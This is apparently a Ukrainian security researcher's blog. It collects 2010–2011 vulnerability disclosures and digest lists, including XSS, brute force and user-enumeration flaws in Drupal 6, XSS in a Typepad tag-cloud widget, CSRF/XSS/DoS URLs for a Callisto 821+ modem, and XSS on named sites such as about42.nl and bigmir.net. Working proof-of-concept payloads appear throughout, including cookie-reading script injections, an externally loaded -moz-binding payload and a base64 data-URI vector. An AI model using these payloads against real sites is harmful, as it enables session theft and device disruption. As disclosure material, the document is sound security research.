Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code (деталі)
• HTTP Response Splitting in Social Share (деталі)
• HP Network Node Manager Command Injection Vulnerability (деталі)
• MyBB 1.6 <= SQL Injection Vulnerability (деталі)
• Buffer overflow vulnerabilities in OpenSSL (деталі)
• Pre Jobo .NET “Password” SQL Injection Vulnerability (деталі)
• SAP Management Console Information Disclosure (деталі)
• Reflected XSS in Coppermine 1.5.10 (деталі)
• SAP Management Console Unauthenticated Service Restart (деталі)
• YEKTAWEB CMS XSS Vulnerability (деталі)

13.04.2011

У серпні, 16.08.2010, я знайшов Cross-Site Scripting та Brute Force уразливості в Drupal. Які я виявив під час секюріті аудиту на одному сайті. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про XSS і AoF уразливості в Drupal.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

25.06.2011

XSS:

На сторінках з формами (наприклад на сторінці коментарю http://site/comment/reply/1, як формах додання, так і редагування даних), що захищені токеном від CSRF, можлива reflected XSS атака. Причому без необхідності знати form_token (тобто захист від CSRF обходиться). Атака проводиться на будь-які форми з включеним FCKeditor/CKEditor (які дуже поширені на сайтах на Drupal). Подібна атака може бути проведена і на форми з TinyMCE - про подібні уразливості в PHP-Nuke через TinyMCE я вже писав.

Якщо це форма редагування даних, то атака може бути проведена тільки на залогіненого користувача сайта, який є власником даного акаунта (хто розмістив даний коментар і т.д.), або адміна сайта. А якщо форма додання даних (наприклад коментарю), то можна проводити атаки на адміна і будь-яких залогінених користувачів сайта. Атакуючий код може бути в параметрі comment, body або іншому, в залежності від форми.

Drupal XSS.html

Brute Force:

В формі логіна в боковій панелі, що розміщена на будь-яких зовнішніх сторінках сайту (http://site/node), не реалізований надійний захист від підбору пароля. В самому Drupal капчі немає, а існуючий Captcha модуль (а також всі плагіни до нього, такі як reCAPTCHA) є уразливим, як я вже писав. Експлоіт відрізняється від попередної BF: якщо в попередній Brute Force уразливості form_id рівний user_login, то в даній - form_id рівний user_login_block.

Уразливі Drupal 6.22 та попереднії версії (перевірено в Drupal 6.17). Враховуючи, що розробники не виправили дані уразливості, то версії 7.x також повинні бути вразливими.

Раніше я вже писав про уразливість в MT-Cumulus для Movable Type. Така ж уразливість є і в віджеті Tumulus для Typepad, що використовує tagcloud.swf розроблений автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

В травні, 11.05.2011, я знайшов Cross-Site Scripting уразливість в Tumulus для Typepad. Про що найближчим часом повідомлю розробнику.

XSS:

http://site/path/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

В себе на сайті автор тримає файл tagcloud-download.swf, який він радить переіменувати на tagcloud.swf.

Код виконається при кліку. Це Strictly social XSS. Також можна провести HTML Injection атаку, подібно до WP-Cumulus.

Уразливі всі версії віджета Tumulus для Typepad.

12.04.2011

У серпні, 16.08.2010, я знайшов Cross-Site Scripting та Abuse of Functionality уразливості в Drupal. Які я виявив під час секюріті аудиту на одному сайті. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про Abuse of Functionality уразливості в Drupal.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

24.06.2011

XSS:

При доданні або зміні даних в будь-яких внутрішніх формах (додання/зміна поста і т.д.) можна провести persistent XSS атаку. XSS код виконається при відвідуванні сторінки редагування (зміна поста і т.д.). Атака проводиться на будь-які форми з включеним FCKeditor/CKEditor (які дуже поширені на сайтах на Drupal). Подібна атака може бути проведена і на форми з TinyMCE - про подібні уразливості в PHP-Nuke через TinyMCE я вже писав.

Для атаки необхідно в поле форми в режимі “Source” вказатиь:
<img onerror="alert(document.cookie)" src="1" />
Також можна відправити POST запит з токеном і атакуючим кодом в параметрі body.

Атака може бути проведена тільки на залогіненого користувача сайта, який є власником даного акаунта, або адміна сайта. Тобто або користувача сам збереже атакуючий код і заманить на цю сторінку адміна, або, з врахування анти-CSRF захисту, через reflected XSS уразливість буде отриманий токен і на користувача або адміна буде проведена persistent XSS атака.

Abuse of Functionality:

При спеціальному запиту до пошуку по користувачам можна визначити логіни всіх користувачів на сайті.

http://site/search/user/%25
http://site/search/user_search/%25

В rss-фідах сайта, зокрема в основному rss-фиді (http://site/rss.xml) можна визначити логині користувачів на сайті, матеріали яких виводяться в даному фіді.

Уразливі Drupal 6.22 та попереднії версії (перевірено в Drupal 6.17). Враховуючи, що розробники не виправили дані уразливості, то версії 7.x також повинні бути вразливими.

Продовжуючи тему уразливостей в ADSL модемі Callisto 821+, розповім вам про нові уразливості в даному модемі. У квітні, 07.04.2011, я виявив Cross-Site Request Forgery та Cross-Site Scripting уразливості в ADSL модемі Callisto 821+ (SI2000 Callisto821+ Router).

Уразлива версія SI2000 Callisto821+ Router: X7821 Annex A v1.0.0.0 / Argon 4×1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. Дана модель з іншими прошивками також повинна бути вразливою.

Дані атаки потрібно проводити на власника модему, який залогінений в адмінку. Враховуючи, що малоймовірно застати його в такому стані, то можна використати раніше згадані уразливості для проведення віддаленого логіну (щоб залогінити його в адмінку). Після чого можна спокійно провести CSRF або XSS атаку.

CSRF:

Окрім раніше згаданих сторінок 8, 10, 12, 95 і 96 для налаштування портів, в диапазоні 1..196 існує чимало інших розділів (де є форма з параметрами, яка вразлива до CSRF). Дані розділи є прихованими (вони не відображаються в адмінці), але до них можна дістатися вказавши відповідний номер в URL.

Зокрема в розділі Ip App Port Configuration (http://192.168.1.1/configuration/ports.html?194), останньому робочому розділі, через CSRF можлива зміна параметрів IP App порта.

В розділі Advanced Ip App Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?194) через CSRF можлива зміна параметрів IP App порта.

XSS:

Окрім раніше згаданих сторінок 8, 10, 12, 95 і 96 для налаштування портів, в диапазоні 1..196 існує чимало інших розділів (де є форма з параметрами, в якій є persistent XSS уразливості). Дані розділи є прихованими (вони не відображаються в адмінці), але до них можна дістатися вказавши відповідний номер в URL.

Зокрема в розділі Ip App Port Configuration (http://192.168.1.1/configuration/ports.html?194), останньому робочому розділі, у всіх текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

В розділі Advanced Ip App Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?194) у всіх текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

В даній добірці уразливості в веб додатках:

• HP StorageWorks Storage Mirroring, Remote Execution of Arbitrary Code (деталі)
• SQL Injection in HTML-EDIT CMS (деталі)
• Path disclosure in Habari (деталі)
• Multiple XSS Vulnerabilities in Openfire 3.6.4 Administrative Section (деталі)
• XSS vulnerability in Habari (деталі)
• Multiple CSRF Vulnerabilities in Openfire 3.6.4 Administrative Section (деталі)
• XSS in HTML-EDIT CMS (деталі)
• LinkSys BEFSR41 Multiple Stored Xss (деталі)
• Path disclosure in HTML-EDIT CMS (деталі)
• XSS vulnerability in ImpressCMS (деталі)

У червні, 25.06.2010, а також додатково 17.06.2011, я знайшов Brute Force та Cross-Site Scripting уразливості на проекті http://about42.nl. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на about42.nl.

Brute Force:

http://about42.nl/www/showinfo.php

XSS:

POST запит на сторінці http://about42.nl/www/showinfo.php

" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')

В полі UserID.

GET/POST запит на сторінці http://about42.nl/www/showheaders.php
<script>alert(document.cookie)</script>В HTTP заголовках: User-Agent, Accept, Accept-Language, Accept-Encoding, Accept-Charset, Referer, а також майже в будь-яких довільних заголовках.

Дані XSS атаки через заголовки можна провести через флеш, про що я писав в статті Відправка серверних заголовків в Flash. Але враховуючи те, що на сайті немає crossdomain.xml, то атака не спрацює в нових версіях флеш-плагіна (тільки в старих версіях), про що я писав у даній статті.

Тому потрібно буде скористатися іншими методами, зокрема для заголовка User-Agent, про що я розповідав в статті XSS атаки через заголовок User-Agent. Деякі з зазначених методів підійдуть і для інших заголовків.

13.10.2010

У червні, 27.06.2010, я знайшов нову Cross-Site Scripting уразливість на сайті http://bigmir.net, обійшови їхній WAF (що я вже робив багато разів). Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на dnevnik.bigmir.net.

Детальна інформація про уразливість з’явиться пізніше.

22.06.2011

XSS:

http://passport.bigmir.net/logout?url=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==

Дана уразливість вже виправлена. І як і в більшості випадків з Бігміром, зробили вони це втихаря (після мого повідомлення), не подякувавши мені. А варто не забувати дякувати людям. При цьому виправлений лише даний вектор атаки, але можливі інші вектори (при цьому потрібно буде обійти їхній WAF).

Зазначу, що в даному функціоналі є також Redirector уразливість, про яку я писав в 2008 році, і яка досі не виправлена.

Продовжуючи тему уразливостей в ADSL модемі Callisto 821+, розповім вам про нові уразливості в даному модемі. У квітні, 07.04.2011, я виявив Denial of Service, Cross-Site Request Forgery та Cross-Site Scripting уразливості в ADSL модемі Callisto 821+ (SI2000 Callisto821+ Router).

Уразлива версія SI2000 Callisto821+ Router: X7821 Annex A v1.0.0.0 / Argon 4×1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. Дана модель з іншими прошивками також повинна бути вразливою.

Дані атаки потрібно проводити на власника модему, який залогінений в адмінку. Враховуючи, що малоймовірно застати його в такому стані, то можна використати раніше згадані уразливості для проведення віддаленого логіну (щоб залогінити його в адмінку). Після чого можна спокійно провести DoS, CSRF або XSS атаку.

DoS:

http://192.168.1.1/configuration/ports.html?120

При даному запиті відбувається рестарт модема.

CSRF:

Дані розділи є прихованими (вони не відображаються в адмінці), але до них можна дістатися вказавши відповідний номер в URL.

В розділі RIP Port Configuration (http://192.168.1.1/configuration/ports.html?10) через CSRF можлива зміна параметрів RIP порта.

В розділі Advanced RIP Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?10) через CSRF можлива зміна параметрів RIP порта.

В розділі Bridge Port Configuration (http://192.168.1.1/configuration/ports.html?12) через CSRF можлива зміна параметрів Bridge порта.

В розділі Advanced Bridge Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?12) через CSRF можлива зміна параметрів Bridge порта.

XSS:

Дані розділи є прихованими (вони не відображаються в адмінці), але до них можна дістатися вказавши відповідний номер в URL.

В розділі RIP Port Configuration (http://192.168.1.1/configuration/ports.html?10) у всіх текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

В розділі Advanced RIP Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?10) у всіх текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

В розділі Bridge Port Configuration (http://192.168.1.1/configuration/ports.html?12) в деяких текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

В розділі Advanced Bridge Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?12) в деяких текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

В даній добірці уразливості в веб додатках:

• Multiple XSS injection vulnerabilities and a offsite redirection flaw within HP System Management Homepage (Insight Manager) (деталі)
• SQL injection in Hycus CMS (деталі)
• HP Insight Diagnostics Online Edition Running on Linux and Windows, Remote Cross Site Scripting (XSS) (деталі)
• SQL injection in Hycus CMS (деталі)
• XSS in Sybase Afaria (деталі)
• SQL injection in Hycus CMS (деталі)
• Security update for libxml2 (деталі)
• Path disclosure in GetSimple CMS (деталі)
• Citrix Access Gateway Command Injection Vulnerability (деталі)
• XSS vulnerability in Habari (деталі)